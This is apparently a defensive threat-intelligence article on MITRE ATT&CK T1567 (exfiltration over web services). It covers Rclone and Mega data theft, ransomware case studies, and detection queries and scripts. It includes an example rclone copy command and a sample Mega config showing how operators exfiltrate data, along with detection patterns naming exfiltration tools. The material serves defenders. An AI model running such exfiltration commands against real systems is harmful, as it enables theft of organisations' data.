Technique ID: T1567
Category: MITRE ATT&CK
Tactics: Exfiltration
Published: March 2026

T1567: Exfiltration Over Web Service

Stolen data has to go somewhere. Increasingly, adversaries send it to the same cloud services every organization already uses: Mega, Google Drive, Dropbox, OneDrive, GitHub, Discord, Telegram, and paste sites such as Pastebin. The logic is simple and effective: corporate firewalls already allow traffic to these services, the connections are TLS-encrypted so content cannot be inspected without interception, and the uploads blend into the legitimate file transfers happening across the network every day. In 2025, Symantec/Broadcom research found the open-source file transfer utility Rclone in 57% of ransomware exfiltration incidents, typically syncing stolen data to Mega cloud storage. With 96% of ransomware attacks now involving data exfiltration as part of double-extortion schemes, T1567 has moved from a niche espionage technique to the primary data theft mechanism of the modern ransomware economy.

Central to the double-extortion ransomware model — 96% of ransomware attacks now involve data theft

T1567 has become the engine of double-extortion ransomware. By Q3 2025, BlackFog reported that 96% of ransomware attacks involved data exfiltration alongside encryption, making data theft the norm rather than the exception. A record 7,458 to 7,960 victims (counts vary by tracker) were named on ransomware leak sites in 2025, a 53% year-over-year increase. The Unit 42 2026 Global Incident Response Report found that the fastest quartile of attackers now reaches exfiltration just 72 minutes after initial access. The Picus Red Report 2026 confirms the strategic pivot from encryption-focused attacks to data theft and extortion, with a 38% decline in encryption payloads as adversaries shift toward silent residency and data harvesting. T1567 has four sub-techniques covering code repositories, cloud storage, text paste sites, and webhooks, each abusing a different class of legitimate web service.

T1567 falls under the Exfiltration tactic (TA0010). Unlike techniques that push stolen data over the adversary's own C2 channel, T1567 uses legitimate, trusted third-party web services. That gives attackers several advantages: the destination domains (google.com, mega.nz, dropbox.com, github.com, discord.com) are allow-listed by corporate firewalls; the traffic is ordinary HTTPS, so content is invisible unless the organization intercepts TLS; the provider supplies bandwidth and availability; and the observable metadata (DNS queries, TLS certificates, connection patterns) looks like normal business activity. What differs is the volume, the timing, and the process making the connection, and that is where detection has to focus.

The technique spans every major platform — Windows, Linux, macOS, ESXi, SaaS, and Office Suite environments. Its adoption has accelerated dramatically since 2019 when the Maze ransomware group pioneered the double-extortion model by publishing stolen data from victims who refused to pay. Within months, nearly every major ransomware operation adopted the approach, and T1567 became the standard mechanism for the data theft half of the equation.

The Four Sub-Techniques

T1567.001 — Exfiltration to Code Repository

Adversaries exfiltrate data to code repositories such as GitHub, GitLab, or Bitbucket over their HTTPS APIs. Repositories provide natural cover in environments where developers push code all day, and API-based access is hard to distinguish from legitimate development activity. The Empire post-exploitation framework (PowerShell Empire) includes GitHub-based exfiltration. This sub-technique is particularly effective against technology companies where Git traffic is ubiquitous.

T1567.002 — Exfiltration to Cloud Storage

This is the dominant sub-technique, accounting for the majority of T1567 activity observed in the wild. Adversaries upload stolen data to cloud storage services including Mega.nz, Google Drive, Dropbox, OneDrive, Amazon S3, and other file hosting platforms. The two primary tools observed are Rclone (an open-source, cross-platform file synchronization utility that supports over 40 cloud storage providers) and MegaSync/MegaCmd (native Mega.nz client tools). Red Canary has observed Mega used as an exfiltration destination in multiple incident response engagements, with adversaries leveraging the free file transfer utilities that Mega provides to its customers.

The Rclone and Mega combination is favored by ransomware operators because Mega offers significant free storage, operates from a jurisdiction with strong privacy protections (New Zealand), and is uncommon in enterprise environments — meaning its presence is itself an indicator of compromise in many organizations. Storm-0501, the ransomware affiliate group, uses renamed Rclone binaries (masquerading as svhost.exe or scvhost.exe) to synchronize stolen data to MegaSync across multiple threads.

T1567.003 — Exfiltration to Text Storage Sites

Adversaries exfiltrate data to text storage sites like Pastebin, Ghostbin, or similar paste services. These services are commonly used by developers to share code and text snippets, providing cover for adversarial data uploads. While paste sites typically have size limits that make them unsuitable for large-scale data theft, they are effective for exfiltrating credentials, configuration files, reconnaissance results, and other text-based intelligence. Infostealers commonly use paste sites to exfiltrate harvested credentials, and C2 frameworks use them to store configuration data or receive commands.

T1567.004 — Exfiltration Over Webhook

The newest sub-technique (added July 2023), reflecting the growing abuse of webhook endpoints for data exfiltration. Adversaries send stolen data to webhook URLs provided by services like Discord, Slack, Microsoft Teams, and custom webhook endpoints. Discord webhooks have become particularly prevalent in commodity malware and infostealers; a CyberArk Labs report documented extensive abuse of Discord's webhook infrastructure for sending stolen credentials and system information from compromised hosts. Webhook exfiltration is difficult to detect because the traffic is standard HTTPS to well-known SaaS platforms, and webhook endpoints can be created anonymously.

How Web Service Exfiltration Works

The exfiltration workflow typically follows a three-stage pattern: data staging, tool deployment, and data transfer.

Data staging. Before exfiltration, adversaries identify and collect target data (T1005, T1039), then compress and often encrypt it using tools like WinRAR, 7-Zip, or tar (T1560). This reduces transfer volume and makes the exfiltrated data harder to inspect even if intercepted. Ransomware operators like BlackByte have developed dedicated exfiltration tools — the Exbyte tool (documented by Symantec) enumerates all document files on an infected machine, creates a summary including filename and directory location, then uploads the collection to cloud hosting services.

Tool deployment. Adversaries deploy file transfer utilities, either bringing their own tools (Rclone, MegaCmd, cloud provider CLI tools) or leveraging tools already present on the system. In living-off-the-land approaches, adversaries may use PowerShell's Invoke-WebRequest or curl to interact with cloud APIs directly. Storm-0501 renames Rclone binaries to resemble legitimate Windows processes (svhost.exe, scvhost.exe) as a masquerading technique (T1036) to avoid detection.

Data transfer. The transfer itself runs over HTTPS to the cloud service, through the provider's API or native client protocol. Rclone reads a configuration file that names the destination remote, holds its credentials, and sets transfer parameters such as parallelism. A typical command looks like: rclone copy --config config.conf /path/to/data remote:bucket --transfers 11 --multi-thread-streams 11. The parallel transfers let adversaries saturate the uplink and finish quickly. Two points for responders: the configuration file is usually dropped next to the binary and is worth recovering, because it identifies the destination account; and the credentials in it are only obscured, not encrypted, unless the operator set a config password (rclone's own "rclone reveal" command decodes them), so the recovered file can often be used to identify and take down the destination.
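The workflow above ends with a command line and a configuration file, and during response the first question is where that command actually sent the data. The script below is an added example, not code from the original page or from Rclone itself: it parses a captured command line and the rclone.conf it referenced, resolves each positional argument to a local path, a named remote or an inline ":backend:" remote, and follows "crypt" and "alias" remotes down to the real provider. The command line, the configuration, the remote names, the flag list and the verb list are constructed assumptions; the conf format and the "remote =" chaining of crypt remotes are how Rclone works.

```python
"""Where does this rclone command send data?

Added example, not code from the original page. Given a captured command
line and the rclone.conf it referenced, it resolves each positional
argument to a local path, a named remote, or an inline ':backend:' remote,
and follows 'crypt' and 'alias' remotes down to the real provider. The
command line and configuration below are constructed samples.
"""
from __future__ import annotations

import configparser
import re
import shlex

SAMPLE_CONF = """\
[mg]
type = mega
user = fake.operator@example.net
pass = OBSCURED_NOT_A_REAL_VALUE

[enc]
type = crypt
remote = mg:loot
password = OBSCURED_NOT_A_REAL_VALUE
"""
SAMPLE_CMD = (r"svhost.exe copy --config C:\Windows\Temp\c.conf D:\Finance enc:loot "
              r"--transfers 11 --multi-thread-streams 11")

DATA_VERBS = {"copy", "sync", "move", "copyto", "moveto", "rcat"}  # verbs that move bytes
WRAPPERS = {"crypt", "alias"}  # backends that sit on top of another remote
# Flags that take a separate value argument (others are treated as booleans); assumed subset
VALUE_FLAGS = {"--config", "--transfers", "--multi-thread-streams", "--bwlimit",
               "--include", "--exclude", "--filter", "--filter-from", "--min-size", "--max-age"}
REMOTE_RE = re.compile(r"^(:?)([A-Za-z][\w .-]*?):(.*)$")  # name:path or :backend:path


def parse_conf(text: str) -> dict[str, dict[str, str]]:
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return {s: dict(cp[s]) for s in cp.sections()}


def resolve_remote(name: str, conf: dict, depth: int = 0) -> str:
    """Backend type behind a named remote, e.g. 'crypt->mega' for an encrypted Mega remote."""
    if depth > 5 or name not in conf:
        return "unknown"
    backend = conf[name].get("type", "unknown")
    m = REMOTE_RE.match(conf[name].get("remote", ""))
    if backend in WRAPPERS and m:
        inner = m.group(2) if m.group(1) else resolve_remote(m.group(2), conf, depth + 1)
        return f"{backend}->{inner}"
    return backend


def classify_arg(arg: str, conf: dict) -> tuple[str, str]:
    """(kind, detail) for one positional argument."""
    m = REMOTE_RE.match(arg)
    if not m or (not m.group(1) and len(m.group(2)) == 1):
        return ("local", arg)           # plain path, or a Windows drive such as D:\Finance
    if m.group(1):
        return ("inline", m.group(2))   # ':s3:bucket' needs no config entry at all
    return ("remote", resolve_remote(m.group(2), conf))


def analyse(cmdline: str, conf_text: str) -> dict:
    argv = shlex.split(cmdline, posix=False)  # non-POSIX mode keeps Windows backslashes
    verb, positionals, flags = None, [], {}
    i = 1  # argv[0] is the binary, whatever it was renamed to
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-"):
            key, _, val = tok.partition("=")
            if not val and key in VALUE_FLAGS and i + 1 < len(argv):
                i += 1
                val = argv[i]
            flags[key.lstrip("-")] = val or "true"
        elif verb is None:
            verb = tok.lower()
        else:
            positionals.append(tok)
        i += 1
    conf = parse_conf(conf_text)
    args = [classify_arg(p, conf) for p in positionals]
    return {
        "binary": argv[0],
        "verb": verb,
        "moves_data": verb in DATA_VERBS,
        "sources": args[:-1],
        "destination": args[-1] if args else None,
        "config": flags.get("config"),
        "transfers": int(flags.get("transfers", 4)),  # rclone's default is 4 parallel transfers
    }


if __name__ == "__main__":
    for k, v in analyse(SAMPLE_CMD, SAMPLE_CONF).items():
        print(f"{k:12} {v}")
```

For the sample, the destination "enc:loot" resolves to "crypt->mega": the operator encrypted file names and contents client-side on top of a Mega account, which is why content inspection at the proxy would have seen nothing useful even with TLS interception. The single-letter check matters on Windows command lines, where D:\Finance would otherwise be mistaken for a remote named "D".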

Why Web Service Exfiltration Matters

Double extortion is now the dominant ransomware model. Backups alone no longer protect organizations. Even if an organization can fully restore encrypted systems from immutable backups, the adversary still holds stolen data as leverage. The threat of publishing sensitive data on leak sites, selling it to competitors, or reporting regulatory violations creates pressure to pay regardless of recovery capability. This has fundamentally changed the economics of ransomware defense.

The exfiltration window is shrinking. The Unit 42 2026 Global Incident Response Report found that the fastest 25% of attackers now reach the exfiltration phase within 72 minutes of initial access. Splunk and Sophos analysis places median dwell time before encryption at four to five days, but the exfiltration often happens days before the ransomware payload is deployed, giving adversaries ample time to transfer terabytes of data before anyone knows a compromise has occurred.

Detection is architecturally difficult. Traditional security controls are designed to block known-bad destinations. T1567 routes data to known-good destinations, the same cloud services the organization uses for legitimate business. Blocking Mega, Dropbox, or Google Drive may be viable for individual services but creates operational disruption. And because the traffic is TLS-encrypted to the provider, even organizations with TLS inspection capabilities often exempt trusted SaaS domains from inspection.

Cloud-to-cloud exfiltration bypasses perimeter controls entirely. Storm-0501's 2025 evolution demonstrates a new threat: cloud-based ransomware where the attacker compromises Azure Storage accounts, exposes them to the internet, and exfiltrates data directly from cloud to attacker infrastructure using Azure's own AzCopy tool. This bypasses on-premises network monitoring entirely because the data never traverses the corporate network.

Real-World Case Studies

Storm-0501 — Hybrid Cloud Ransomware with Rclone and Mega Exfiltration (2024-2025)

Storm-0501, a financially motivated ransomware affiliate group active since 2021, has deployed Rclone renamed as svhost.exe or scvhost.exe to exfiltrate data to MegaSync cloud storage. Microsoft's Threat Intelligence team documented the group using multi-threaded Rclone transfers with dedicated configuration files synchronizing stolen data across 11 parallel streams. In their 2025 evolution, Storm-0501 shifted to cloud-based ransomware tactics: after compromising Azure environments through stolen Entra ID credentials, they exfiltrated data directly from Azure Storage accounts using Microsoft's own AzCopy utility, then destroyed backups and demanded ransom via compromised Microsoft Teams accounts. This represents the convergence of T1567 with cloud-native attack techniques that bypass traditional perimeter monitoring.

Scattered Spider — Data Theft for Extortion Across Industries (2023-2025)

Scattered Spider (also tracked as Octo Tempest), a cybercriminal group that targets large companies and their IT help desks, engages in data theft for extortion as a core business model. According to a July 2025 joint advisory from CISA, FBI, and international partners, Scattered Spider uses multiple ransomware variants (most recently DragonForce) alongside data exfiltration to cloud services. The group leverages living-off-the-land techniques and legitimate remote access tools to identify, stage, and exfiltrate sensitive data to cloud storage before deploying ransomware. Their ability to rapidly compromise identities through sophisticated social engineering — including SIM swapping, MFA fatigue, and help desk impersonation — gives them the access needed to locate and exfiltrate high-value data within hours of initial access.

Medusa Ransomware — Exfiltration to Cloud Storage in Double-Extortion Campaigns (2025)

The Medusa ransomware group, which impacted over 300 organizations across critical infrastructure sectors by early 2025, uses systematic data exfiltration to cloud storage as part of its double-extortion model. The March 2025 joint advisory from CISA, FBI, and MS-ISAC documented Medusa's use of Rclone and other tools to transfer stolen data to attacker-controlled cloud storage before deploying encryption. Medusa's operators search for files associated with remote management services, financial records, and intellectual property, then exfiltrate this data to provide leverage during ransom negotiations. Victims who refuse to pay face publication on Medusa's dedicated leak site.

BlackByte / Exbyte — Purpose-Built Exfiltration Tool (2022-2025)

BlackByte ransomware operators developed Exbyte, a dedicated exfiltration tool written in Go, specifically for automating data theft to cloud storage. Documented by Symantec in 2022 and observed in Microsoft incident response engagements through 2025, Exbyte enumerates all document files on an infected machine, creates a summary including filename and directory location, then uploads the entire collection to an adversary-controlled cloud hosting account. The creation of a purpose-built exfiltration tool — rather than relying on generic utilities like Rclone — demonstrates how ransomware operations are investing in specialized tooling for each phase of the attack, treating data exfiltration as important as the encryption itself.

APT29 (NOBELIUM), Turla and OilRig: Cloud Service Abuse for Espionage Exfiltration

APT29, attributed to Russia's SVR, has been documented using multiple web services for data exfiltration across its espionage campaigns. The BoomBox malware, part of NOBELIUM's early-stage toolset, searched for specific files and directories on compromised machines, then exfiltrated collected data to cloud storage services. Turla, another Russian espionage group, used Crutch malware to exfiltrate data through Dropbox, leveraging the legitimate cloud storage service as both a C2 channel and an exfiltration destination. OilRig (APT34), the Iranian threat group, used cloud service-powered downloaders that also served as exfiltration channels, blending data theft with command-and-control traffic through the same cloud infrastructure.

Contagious Interview / Lazarus Group — Telegram-Based Exfiltration

North Korean threat actors operating the Contagious Interview campaign have used Telegram Bot API endpoints with pre-configured bot tokens to exfiltrate stolen data. The InvisibleFerret malware sends harvested files, credentials, and system information as messages or file attachments to adversary-controlled Telegram channels. Magic Hound (APT42), the Iranian threat group, uses similar Telegram-based exfiltration. The calls are ordinary HTTPS requests to api.telegram.org, hard to distinguish from legitimate Telegram usage; the one durable signal is the process making them, since no browser or Telegram client calls the Bot API with a hard-coded token.

Detection Strategies

Detecting T1567 requires a shift from traditional signature-based approaches to behavioral and volumetric analysis. The challenge is that the destination services are legitimate and the traffic is encrypted, so defenders must focus on detecting the tools, the transfer patterns, and the anomalous data flows rather than the content itself.

Rclone appears in 57% of ransomware exfiltration incidents

Symantec/Broadcom research found that Rclone is present in 57% of ransomware exfiltration incidents. Detecting Rclone execution, its configuration files, and its network traffic patterns should be a top priority. Because Rclone is rarely used legitimately in most enterprise environments, its presence on a workstation is a strong indicator of compromise. Before alerting on every execution, inventory sanctioned use (backup jobs, data-science or DevOps hosts that sync to object storage) and scope those out by host and account; an allow-list of hosts is safer than an allow-list of binary names, since adversaries rename the binary. Alert on any other Rclone execution, any process connecting to Mega infrastructure, and any renamed binary that exhibits Rclone-like behaviour.

Key Monitoring Points

Data Source | What to Monitor | Detection Logic
Sysmon Event ID 1 (Process Creation) | Rclone, MegaCmd, MegaSync execution | Flag execution of rclone.exe, megacmd.exe, megasync.exe, or any process with Rclone/Mega in its OriginalFileName or Description metadata. Also flag renamed binaries with Rclone command-line patterns (copy, sync, --config, --transfers)
Sysmon Event ID 11 (File Created) | Rclone configuration files | Alert on creation of .conf or .config files in temporary or unusual directories; Sysmon records only the path, so matching cloud storage keywords in the content (type = mega, remote, s3, drive, dropbox) needs EDR file inspection
Network Traffic (DNS/NetFlow) | Connections to uncommon cloud storage | Monitor DNS queries and connections to mega.nz, mega.co.nz, *.userstorage.mega.co.nz from any host. Mega is rarely used legitimately in enterprise environments, so any connection is suspicious
Network Traffic (Volumetric) | Anomalous outbound data volume | Baseline normal outbound volume per host and per user, then alert on large deviations. A workstation that typically sends 100 MB/day and suddenly uploads 50 GB warrants investigation regardless of destination
Cloud Access Security Broker (CASB) | Uploads to unsanctioned cloud services | Monitor and control access to cloud storage. Flag uploads to personal or unsanctioned tenants, especially from sensitive systems or during off-hours
Sysmon Event ID 3 (Network Connection) | Discord/Telegram webhook connections from non-browser processes | Flag connections to discord.com/api/webhooks or api.telegram.org/bot<token> from non-browser processes. Baseline and allow-list legitimate webhook usage from business applications
Endpoint / EDR | Large archive creation before upload | Correlate creation of large archive files (.zip, .rar, .7z, .tar.gz) with a subsequent network connection from the same host to a cloud storage service. Staging followed by exfiltration is a strong signal
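The table describes the logic; the script below runs three rows of it over sample telemetry so the edge cases are concrete. It is an added example, not code from the original page or from any vendor: it flags renamed Rclone binaries (one keeps its OriginalFileName, one has version information stripped and is caught only by its command line), Discord or Telegram traffic from a non-browser process, and an archive written shortly before a cloud-storage connection from the same host. The events, hostnames, paths, browser allow-list and cloud domain list are all constructed assumptions to be tuned per environment.

```python
"""Behavioural T1567 detections over Sysmon-style events.

Added example, not code from the original page. The rules mirror three
rows of the monitoring table: renamed-Rclone execution (Event ID 1),
webhook traffic from non-browser processes (Event ID 3), and an archive
written shortly before a cloud-storage connection (Event ID 11 then 3).
Every event below is constructed sample data; the allow-lists are
assumptions to tune per environment.
"""
from __future__ import annotations

import re
from datetime import datetime, timedelta
from ntpath import basename  # handles Windows paths on any OS

BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "brave.exe",
            "teams.exe", "ms-teams.exe", "slack.exe"}  # assumed allow-list
WEBHOOK_HOSTS = ("discord.com", "discordapp.com", "api.telegram.org")
CLOUD_STORAGE = ("mega.nz", "mega.co.nz", "dropbox.com", "googleapis.com",
                 "drive.google.com", "onedrive.live.com", "amazonaws.com")
ARCHIVE_EXT = (".zip", ".rar", ".7z", ".tar.gz", ".tgz")

RCLONE_VERB = re.compile(r"\s(copy|sync|move|copyto|moveto)\s", re.I)
RCLONE_FLAG = re.compile(r"--(config|transfers|multi-thread-streams|bwlimit)\b", re.I)
# "name:path" destination; a single letter before ':' is a drive (C:\) and
# "scheme://" is a URL, so both are excluded.
RCLONE_REMOTE = re.compile(r"\s[A-Za-z][\w-]+:(?![\\/])\S*")


def host_matches(hostname: str, suffixes: tuple[str, ...]) -> bool:
    h = hostname.lower()
    return any(h == s or h.endswith("." + s) for s in suffixes)


def is_rclone(ev: dict) -> bool:
    """Event ID 1: Rclone by file name, by PE metadata, or by command-line shape."""
    if ev.get("EventID") != 1:
        return False
    if basename(ev.get("Image", "")).lower() in ("rclone.exe", "rclone"):
        return True
    if ev.get("OriginalFileName", "").lower() == "rclone.exe":
        return True
    # Renamed binary with stripped version info: require a data-moving verb
    # plus either a characteristic flag or a remote:path argument.
    cl = " " + ev.get("CommandLine", "") + " "
    return bool(RCLONE_VERB.search(cl)
                and (RCLONE_FLAG.search(cl) or RCLONE_REMOTE.search(cl)))


def is_nonbrowser_webhook(ev: dict) -> bool:
    """Event ID 3: Discord/Telegram API reached by something other than a browser."""
    if ev.get("EventID") != 3:
        return False
    if not host_matches(ev.get("DestinationHostname", ""), WEBHOOK_HOSTS):
        return False
    return basename(ev.get("Image", "")).lower() not in BROWSERS


def staging_then_upload(events: list[dict], window=timedelta(hours=1)) -> list[tuple]:
    """Pair each archive creation with a later cloud-storage connection from the same host."""
    archives = [e for e in events if e.get("EventID") == 11
                and e.get("TargetFilename", "").lower().endswith(ARCHIVE_EXT)]
    uploads = [e for e in events if e.get("EventID") == 3
               and host_matches(e.get("DestinationHostname", ""), CLOUD_STORAGE)]
    hits = []
    for a in archives:
        for u in uploads:
            gap = u["UtcTime"] - a["UtcTime"]
            if u["host"] == a["host"] and timedelta(0) <= gap <= window:
                hits.append((a["host"], a["TargetFilename"], u["DestinationHostname"], u["Image"]))
    return hits


def run(events: list[dict]) -> list[tuple[str, str, str]]:
    alerts = []
    for e in events:
        if is_rclone(e):
            alerts.append(("rclone_execution", e["host"], e["CommandLine"]))
        if is_nonbrowser_webhook(e):
            alerts.append(("webhook_nonbrowser", e["host"], e["Image"]))
    for host, archive, dest, image in staging_then_upload(events):
        alerts.append(("staging_then_cloud_upload", host, f"{archive} -> {dest} via {image}"))
    return alerts


T0 = datetime(2025, 6, 1, 2, 10)  # constructed timestamps
EVENTS = [  # constructed Sysmon events, not real telemetry
    {"EventID": 11, "host": "WS-042", "UtcTime": T0 - timedelta(minutes=20),
     "Image": r"C:\Program Files\7-Zip\7z.exe", "TargetFilename": r"C:\Users\Public\f.7z"},
    {"EventID": 1, "host": "WS-042", "UtcTime": T0, "Image": r"C:\Windows\Temp\svhost.exe",
     "OriginalFileName": "rclone.exe",  # renamed, but version info intact
     "CommandLine": r"svhost.exe copy --config C:\Windows\Temp\c.conf D:\Finance enc:loot --transfers 11 --multi-thread-streams 11"},
    {"EventID": 1, "host": "WS-042", "UtcTime": T0, "Image": r"C:\Windows\Temp\scvhost.exe",
     "OriginalFileName": "",  # version info stripped: only the command line gives it away
     "CommandLine": r"scvhost.exe sync E:\HR mega:hr --transfers 8"},
    {"EventID": 1, "host": "WS-007", "UtcTime": T0, "Image": r"C:\Windows\System32\Robocopy.exe",
     "OriginalFileName": "robocopy.exe", "CommandLine": r"Robocopy.exe C:\src \\fs01\share /MIR"},
    {"EventID": 3, "host": "WS-042", "UtcTime": T0 + timedelta(minutes=3), "Image": r"C:\Windows\Temp\svhost.exe",
     "DestinationHostname": "gfs270n123.userstorage.mega.co.nz", "DestinationPort": 443},
    {"EventID": 3, "host": "WS-113", "UtcTime": T0, "Image": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "DestinationHostname": "discord.com", "DestinationPort": 443},
    {"EventID": 3, "host": "WS-113", "UtcTime": T0, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "discord.com", "DestinationPort": 443},
    {"EventID": 11, "host": "WS-007", "UtcTime": T0, "Image": r"C:\Program Files\7-Zip\7z.exe",
     "TargetFilename": r"C:\build\release.zip"},  # archive with no upload afterwards: no alert
]

if __name__ == "__main__":
    for alert in run(EVENTS):
        print(" | ".join(alert))
```

Robocopy is the deliberate false-positive check: "copy" inside the file name does not satisfy the verb pattern, which requires whitespace on both sides, and the UNC source contains no remote:path token. The correlation rule joins on host rather than process because staging is usually done by 7-Zip or WinRAR and the upload by a different binary.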

Splunk Detection Queries

Query 1: Rclone Execution Detection

Detects execution of Rclone or renamed Rclone binaries from the process name, the PE OriginalFileName that Sysmon records, and command-line patterns. This is the single highest-value detection for T1567 given Rclone's 57% prevalence in ransomware exfiltration. process_name and process_path are CIM-normalised fields; on raw Sysmon data use Image instead. A renamed binary with stripped version information only trips the command-line branch, so that branch accepts any of Rclone's data-moving verbs together with a characteristic flag or destination; "remote:" is just the conventional remote name from the example above, so adjust it to the naming seen in your environment or drop it.

index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
((process_name=rclone.exe OR OriginalFileName=rclone.exe)
  OR ((CommandLine="* copy *" OR CommandLine="* sync *" OR CommandLine="* move *")
    AND (CommandLine="*--config*" OR CommandLine="*--transfers*"
      OR CommandLine="*--multi-thread-streams*" OR CommandLine="*remote:*")))
| table _time host user process_name process_path CommandLine parent_process_name OriginalFileName
| sort -_time

Query 2: Mega.nz Network Connections

Detects network connections to Mega cloud storage infrastructure. Because Mega is rarely used legitimately in enterprise environments, any connection to Mega domains warrants investigation, so the query groups by the client address rather than imposing a count threshold (on DNS logs the host field is usually the resolver, not the client). The patterns are anchored to the domain so that unrelated names such as omega.nz do not match.

index=dns OR index=proxy OR index=firewall earliest=-24h
(query IN ("mega.nz","*.mega.nz","mega.co.nz","*.mega.co.nz","mega.io","*.mega.io")
  OR dest_host IN ("mega.nz","*.mega.nz","mega.co.nz","*.mega.co.nz")
  OR url="*://mega.nz/*" OR url="*://*.mega.co.nz/*")
| stats count min(_time) as first_seen max(_time) as last_seen values(query) as domains values(dest_host) as hosts by src_ip
| sort -count

Query 3: Discord/Telegram Webhook Abuse

Detects non-browser processes communicating with Discord or Telegram Bot API endpoints, which may indicate infostealer or malware exfiltration via webhook. Sysmon fills DestinationHostname from a reverse lookup, which for Discord is often blank or a CDN name, so the query also takes Event ID 22 (DNS query), where QueryName holds the name the process actually asked for. The Discord desktop client (Discord.exe) will appear in the results; triage it on signature and install path rather than adding the name to the exclusion, because malware masquerades under it.

index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode=3 OR EventCode=22)
(DestinationHostname IN ("discord.com","*.discord.com","discordapp.com","*.discordapp.com","api.telegram.org")
  OR QueryName IN ("discord.com","*.discord.com","discordapp.com","*.discordapp.com","api.telegram.org"))
NOT (Image="*\\chrome.exe" OR Image="*\\firefox.exe" OR Image="*\\msedge.exe"
  OR Image="*\\brave.exe" OR Image="*\\Teams.exe" OR Image="*\\ms-teams.exe" OR Image="*\\slack.exe")
| table _time host user Image DestinationHostname QueryName DestinationPort
| sort -_time

Query 4: Anomalous Outbound Data Volume

Detects hosts sending significantly more data than their historical baseline, a pattern consistent with bulk data exfiltration to cloud services. The search window must be long enough to contain a real baseline (14 days here), and the 1 GiB floor keeps low-volume hosts from alerting on noise. Note the limitation: eventstats computes the mean and deviation over the same window it tests, so the anomalous hours are part of their own baseline. A single large burst still stands out, but a multi-hour drip raises the host's mean and deviation enough to hide itself. For production use, compute the baseline from a prior window (a summary index or lookup refreshed daily) and test the current day against it.

index=firewall OR index=proxy earliest=-14d
| bin _time span=1h
| stats sum(bytes_out) as hourly_bytes_out by src_ip _time
| eventstats avg(hourly_bytes_out) as avg_out stdev(hourly_bytes_out) as stdev_out count as hours by src_ip
| where hours >= 48 AND hourly_bytes_out > (avg_out + (3 * stdev_out)) AND hourly_bytes_out > 1073741824
| eval GB_sent=round(hourly_bytes_out/1073741824,2), avg_GB=round(avg_out/1073741824,3)
| table _time src_ip GB_sent avg_GB hourly_bytes_out
| sort -GB_sent
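The self-referential baseline problem is easier to believe when you can see it fail. The script below is an added example, not code from the original page: on constructed hourly byte counts it runs the same mean-plus-three-deviations test twice, once over the whole window with the tested hours included (what the eventstats query does) and once against a trailing baseline built only from the seven days before each hour. A host that drips 1.5 GB every hour for a day is never flagged by the first method and is flagged by the second until its own spikes have polluted the trailing window. The hosts, byte ranges and thresholds are assumptions.

```python
"""Volumetric exfiltration detection on hourly outbound byte counts.

Added example, not code from the original page. The flow records are
constructed, not real telemetry. It contrasts two baselines: one computed
over the whole search window with the tested hours included (what the
eventstats query above does) and a trailing baseline built only from the
days before each hour under test.
"""
from __future__ import annotations

import random
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, stdev

GIB = 1024 ** 3
START = datetime(2025, 6, 1)
SPIKE_START = START + timedelta(days=7)   # day 8 is the exfiltration day
VICTIM, CLEAN = "10.1.5.42", "10.1.5.77"  # constructed hosts


def make_flows() -> list[tuple[str, datetime, int]]:
    """Constructed (src_ip, timestamp, bytes_out) records: seven clean days for
    two hosts, then a day on which VICTIM drips 1.5 GB every hour."""
    rng = random.Random(7)  # deterministic sample data
    flows = []
    for h in range(8 * 24):
        ts = START + timedelta(hours=h)
        for ip in (VICTIM, CLEAN):
            b = rng.randint(20_000_000, 120_000_000)  # ordinary 20-120 MB/hour
            if ip == VICTIM and ts >= SPIKE_START:
                b = 1_500_000_000  # slow, steady exfiltration
            flows.append((ip, ts, b))
    return flows


def hourly_bins(flows) -> dict[tuple[str, datetime], int]:
    """Sum bytes_out per (src_ip, hour), like 'bin _time span=1h | stats sum'."""
    bins: dict[tuple[str, datetime], int] = defaultdict(int)
    for ip, ts, b in flows:
        bins[(ip, ts.replace(minute=0, second=0, microsecond=0))] += b
    return dict(bins)


def whole_window_outliers(bins, z=3.0, floor=GIB):
    """Baseline = every hour of the host in the window, tested hours included."""
    per_host: dict[str, list[tuple[datetime, int]]] = defaultdict(list)
    for (ip, ts), b in bins.items():
        per_host[ip].append((ts, b))
    hits = []
    for ip, rows in per_host.items():
        vals = [b for _, b in rows]
        if len(vals) < 2:
            continue
        mu, sd = mean(vals), stdev(vals)
        hits += [(ip, ts, b) for ts, b in rows if b > floor and b > mu + z * sd]
    return hits


def trailing_outliers(bins, train_days=7, z=3.0, floor=GIB, min_hours=48):
    """Baseline = the host's hours in the train_days before the tested hour only."""
    per_host: dict[str, dict[datetime, int]] = defaultdict(dict)
    for (ip, ts), b in bins.items():
        per_host[ip][ts] = b
    hits = []
    for ip, series in per_host.items():
        for ts, b in sorted(series.items()):
            if b <= floor:
                continue  # absolute floor: sub-GB hours never alert on noise alone
            lo = ts - timedelta(days=train_days)
            train = [v for t, v in series.items() if lo <= t < ts]
            if len(train) < min_hours:
                continue  # not enough history to baseline this host
            if b > mean(train) + z * stdev(train):
                hits.append((ip, ts, b))
    return hits


if __name__ == "__main__":
    bins = hourly_bins(make_flows())
    print("whole-window baseline flagged:", len(whole_window_outliers(bins)), "hours")
    flagged = trailing_outliers(bins)
    print("trailing baseline flagged:", len(flagged), "hours, first at",
          flagged[0][1] if flagged else None)
```

The trailing method stops firing part-way through the day because each flagged hour enters the next hour's training set. That is the second lesson: freeze the baseline (for example, train only on days that produced no alerts) or the attacker's own traffic becomes the new normal.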

Known Threat Actors and Malware

Ransomware and Double-Extortion Groups

Actor / Malware | T1567 Usage
Storm-0501 | Rclone renamed as svhost.exe/scvhost.exe exfiltrating to MegaSync; AzCopy for cloud-to-cloud exfiltration from Azure Storage (2024-2025)
Scattered Spider | Data exfiltration to cloud storage as core extortion business model; deploys DragonForce ransomware alongside data theft (2025 CISA advisory)
Medusa | Rclone-based exfiltration to cloud storage before double-extortion encryption; 300+ victims by early 2025
BlackByte / Exbyte | Purpose-built Go-based exfiltration tool that enumerates documents and uploads to cloud hosting
Conti / Bazar | Rclone exfiltration to cloud storage documented in The DFIR Report and leaked operator playbooks
Sabbath (54bb47h) | Early Storm-0501 operations using cloud exfiltration targeting US school districts
Embargo | Double-extortion model with cloud-based data exfiltration through Storm-0501 affiliate operations

